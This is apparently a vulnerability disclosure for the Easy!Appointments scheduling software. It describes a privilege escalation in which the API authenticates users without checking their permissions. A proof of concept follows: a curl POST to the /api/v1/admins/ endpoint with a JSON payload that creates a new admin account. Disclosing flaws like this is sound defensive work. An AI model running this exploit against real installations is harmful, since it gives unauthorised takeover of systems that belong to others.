# Description

Privilege escalation occurs when a user gets access to more resources or functionality than they are normally allowed, and such elevation or changes should have been prevented by the application. This is usually caused by a flaw in the application.

On Easy!Appointments API authorization is checked against the user’s existence, without validating the permissions. As a result, a low privileged user (eg. provider) can create a new admin user via the “/api/v1/admins/” endpoint and take over the system.

# Proof of Concept
“`
curl –request POST https://easyappointments.org/index.php/api/v1/admins/ -d @payload.json –user user:pass
“`

### payload.json

“`
{
“id”: 100,
“firstName”: “Admin”,
“lastName”: “Admin”,
“email”: “[email protected]”,
“mobile”: null,
“phone”: “111”,
“address”: null,
“city”: null,
“state”: null,
“zip”: null,
“notes”: null,
“timezone”: “UTC”,
“settings”: {
“username”: “usern@me”,
“password”: “p@ssw0rd”,
“notifications”: true,
“calendarView”: “default”
}
}
“`